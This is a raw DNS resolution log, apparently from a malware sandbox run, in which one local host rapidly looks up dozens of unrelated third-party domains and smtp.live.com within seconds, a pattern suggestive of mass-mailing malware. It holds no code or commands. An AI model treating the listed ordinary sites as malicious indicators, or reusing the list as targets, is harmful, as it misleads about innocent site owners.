                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.955254078 CET8.8.8.8192.168.2.50x6ff2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.467080116 CET8.8.8.8192.168.2.50xd135No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.472501993 CET8.8.8.8192.168.2.50x9970No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.489442110 CET8.8.8.8192.168.2.50xd8e5No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.667958975 CET8.8.8.8192.168.2.50xa91eServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.669857025 CET8.8.8.8192.168.2.50x5907No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.787259102 CET8.8.8.8192.168.2.50x6e5No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.792141914 CET8.8.8.8192.168.2.50xdb13No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.792141914 CET8.8.8.8192.168.2.50xdb13No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.804425955 CET8.8.8.8192.168.2.50xc2ecNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.866167068 CET8.8.8.8192.168.2.50xff9dServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.917259932 CET8.8.8.8192.168.2.50x93cbNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.917259932 CET8.8.8.8192.168.2.50x93cbNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.921344042 CET8.8.8.8192.168.2.50xbd07No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.926220894 CET8.8.8.8192.168.2.50xbda9No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.926378965 CET8.8.8.8192.168.2.50xa2f3No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.932710886 CET8.8.8.8192.168.2.50x6ff2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.932923079 CET8.8.8.8192.168.2.50x4ad3No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.933612108 CET8.8.8.8192.168.2.50xd1dbNo error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.947578907 CET8.8.8.8192.168.2.50x1093No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.947578907 CET8.8.8.8192.168.2.50x1093No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.949214935 CET8.8.8.8192.168.2.50xb117No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.951540947 CET8.8.8.8192.168.2.50xcc77No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.957427979 CET8.8.8.8192.168.2.50x9518Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.966887951 CET8.8.8.8192.168.2.50x44a9No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.966887951 CET8.8.8.8192.168.2.50x44a9No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.990758896 CET8.8.8.8192.168.2.50x1078No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.990758896 CET8.8.8.8192.168.2.50x1078No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.990758896 CET8.8.8.8192.168.2.50x1078No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.992223024 CET8.8.8.8192.168.2.50xd174No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:12.993828058 CET8.8.8.8192.168.2.50x1cf2No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.003720045 CET8.8.8.8192.168.2.50x80e4No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.006475925 CET8.8.8.8192.168.2.50xf253Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.007853031 CET8.8.8.8192.168.2.50x4f0No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.008961916 CET8.8.8.8192.168.2.50x8f9Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.014276981 CET8.8.8.8192.168.2.50x92d6No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.033437014 CET8.8.8.8192.168.2.50x3099Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.051981926 CET8.8.8.8192.168.2.50xfbd5No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.056849957 CET8.8.8.8192.168.2.50x2492No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.072388887 CET8.8.8.8192.168.2.50x29a1Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.080444098 CET8.8.8.8192.168.2.50xda5No error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.091989040 CET8.8.8.8192.168.2.50x73fcNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.154808998 CET8.8.8.8192.168.2.50xcbc0No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.273468971 CET8.8.8.8192.168.2.50x56dfNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.360877037 CET8.8.8.8192.168.2.50x88edNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.487540007 CET8.8.8.8192.168.2.50x6050No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.675959110 CET8.8.8.8192.168.2.50x2a1aNo error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.675959110 CET8.8.8.8192.168.2.50x2a1aNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.675959110 CET8.8.8.8192.168.2.50x2a1aNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.675959110 CET8.8.8.8192.168.2.50x2a1aNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.712884903 CET8.8.8.8192.168.2.50xaf21No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.723654032 CET8.8.8.8192.168.2.50xdfc7No error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.908641100 CET8.8.8.8192.168.2.50x6e7eNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.953370094 CET8.8.8.8192.168.2.50x5bf6No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.957726002 CET8.8.8.8192.168.2.50xdf68Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.973402023 CET8.8.8.8192.168.2.50x6ff2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:13.993581057 CET8.8.8.8192.168.2.50x7f1eName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.021565914 CET8.8.8.8192.168.2.50x729Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.065200090 CET8.8.8.8192.168.2.50xeac6No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.065200090 CET8.8.8.8192.168.2.50xeac6No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.090120077 CET8.8.8.8192.168.2.50xae40No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.212094069 CET8.8.8.8192.168.2.50x2caNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.233352900 CET8.8.8.8192.168.2.50x8f8eNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.262878895 CET8.8.8.8192.168.2.50x9b10No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.279356956 CET8.8.8.8192.168.2.50xaf77No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.293673038 CET8.8.8.8192.168.2.50xc247No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.293673038 CET8.8.8.8192.168.2.50xc247No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.337197065 CET8.8.8.8192.168.2.50x1c6No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.337197065 CET8.8.8.8192.168.2.50x1c6No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.450337887 CET8.8.8.8192.168.2.50x9ce6No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.450337887 CET8.8.8.8192.168.2.50x9ce6No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.455842018 CET8.8.8.8192.168.2.50x862dNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.494189978 CET8.8.8.8192.168.2.50x1df0No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.599217892 CET8.8.8.8192.168.2.50xa858No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.622344971 CET8.8.8.8192.168.2.50x6517No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.622344971 CET8.8.8.8192.168.2.50x6517No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.653491020 CET8.8.8.8192.168.2.50x8438No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.705060959 CET8.8.8.8192.168.2.50x82a4No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.705060959 CET8.8.8.8192.168.2.50x82a4No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.705060959 CET8.8.8.8192.168.2.50x82a4No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.705060959 CET8.8.8.8192.168.2.50x82a4No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.742755890 CET8.8.8.8192.168.2.50x99e1No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.830144882 CET8.8.8.8192.168.2.50xf585No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.857148886 CET8.8.8.8192.168.2.50xeb23No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.857148886 CET8.8.8.8192.168.2.50xeb23No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:14.986116886 CET8.8.8.8192.168.2.50xa1a1Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.015224934 CET8.8.8.8192.168.2.50x9532Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.067428112 CET8.8.8.8192.168.2.50x90feNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.074111938 CET8.8.8.8192.168.2.50x1655Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.075952053 CET8.8.8.8192.168.2.50xa979Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.111694098 CET8.8.8.8192.168.2.50xabecName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.130624056 CET8.8.8.8192.168.2.50x4711No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.138267040 CET8.8.8.8192.168.2.50xc89fName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.228935957 CET8.8.8.8192.168.2.50x470aNo error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.244132042 CET8.8.8.8192.168.2.50x46dfNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.369294882 CET8.8.8.8192.168.2.50x477fNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.402440071 CET8.8.8.8192.168.2.50x57e3No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.493370056 CET8.8.8.8192.168.2.50x93daNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.675930023 CET8.8.8.8192.168.2.50xd102Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.703299999 CET8.8.8.8192.168.2.50xa988No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.732091904 CET8.8.8.8192.168.2.50xe039No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.759828091 CET8.8.8.8192.168.2.50x9c57No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.760029078 CET8.8.8.8192.168.2.50xd00fNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.760029078 CET8.8.8.8192.168.2.50xd00fNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.760029078 CET8.8.8.8192.168.2.50xd00fNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.760029078 CET8.8.8.8192.168.2.50xd00fNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.824073076 CET8.8.8.8192.168.2.50xe597No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.845616102 CET8.8.8.8192.168.2.50x81efNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.882515907 CET8.8.8.8192.168.2.50xb496No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.887682915 CET8.8.8.8192.168.2.50xcc38No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.893101931 CET8.8.8.8192.168.2.50x271aNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:15.932976961 CET8.8.8.8192.168.2.50xc3b4No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.037183046 CET8.8.8.8192.168.2.50x6ff2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.138669014 CET8.8.8.8192.168.2.50xe3b4No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.236249924 CET8.8.8.8192.168.2.50x133eNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.261096001 CET8.8.8.8192.168.2.50xa0b5No error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.280693054 CET8.8.8.8192.168.2.50x799aName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.306677103 CET8.8.8.8192.168.2.50xe77dName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.332518101 CET8.8.8.8192.168.2.50x6dd0Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.403743982 CET8.8.8.8192.168.2.50x4294Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.414175034 CET8.8.8.8192.168.2.50x323No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.550932884 CET8.8.8.8192.168.2.50x292dServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.552485943 CET8.8.8.8192.168.2.50x3111No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.552485943 CET8.8.8.8192.168.2.50x3111No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.552485943 CET8.8.8.8192.168.2.50x3111No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.558744907 CET8.8.8.8192.168.2.50xa3b8No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.753686905 CET8.8.8.8192.168.2.50x3178No error (0)invictus.pl193.107.88.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.767142057 CET8.8.8.8192.168.2.50xe053No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.773884058 CET8.8.8.8192.168.2.50x370eServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.848753929 CET8.8.8.8192.168.2.50x3190No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.848753929 CET8.8.8.8192.168.2.50x3190No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.900388956 CET8.8.8.8192.168.2.50x123bName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.914752960 CET8.8.8.8192.168.2.50x4631Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.989646912 CET8.8.8.8192.168.2.50xd3f9No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.989646912 CET8.8.8.8192.168.2.50xd3f9No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:16.994338989 CET8.8.8.8192.168.2.50x4922No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.081501007 CET8.8.8.8192.168.2.50xb0f4No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.125088930 CET8.8.8.8192.168.2.50xb5c7No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.234651089 CET8.8.8.8192.168.2.50xdc3bNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.502041101 CET8.8.8.8192.168.2.50xeeb1Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.539331913 CET8.8.8.8192.168.2.50xccdbNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.586297035 CET8.8.8.8192.168.2.50x5f6aNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.706271887 CET8.8.8.8192.168.2.50xbdeaName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.760313034 CET8.8.8.8192.168.2.50x7709No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.764820099 CET8.8.8.8192.168.2.50x4432No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.771749020 CET8.8.8.8192.168.2.50xc0f8No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.842763901 CET8.8.8.8192.168.2.50xc597Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.907825947 CET8.8.8.8192.168.2.50xd97bServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.947638988 CET8.8.8.8192.168.2.50xe5daNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.958625078 CET8.8.8.8192.168.2.50x90d2No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.973618984 CET8.8.8.8192.168.2.50xa011No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.048306942 CET8.8.8.8192.168.2.50x82b1No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.048306942 CET8.8.8.8192.168.2.50x82b1No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.048306942 CET8.8.8.8192.168.2.50x82b1No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.048306942 CET8.8.8.8192.168.2.50x82b1No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.110153913 CET8.8.8.8192.168.2.50xf19dName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.154185057 CET8.8.8.8192.168.2.50x6fcServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
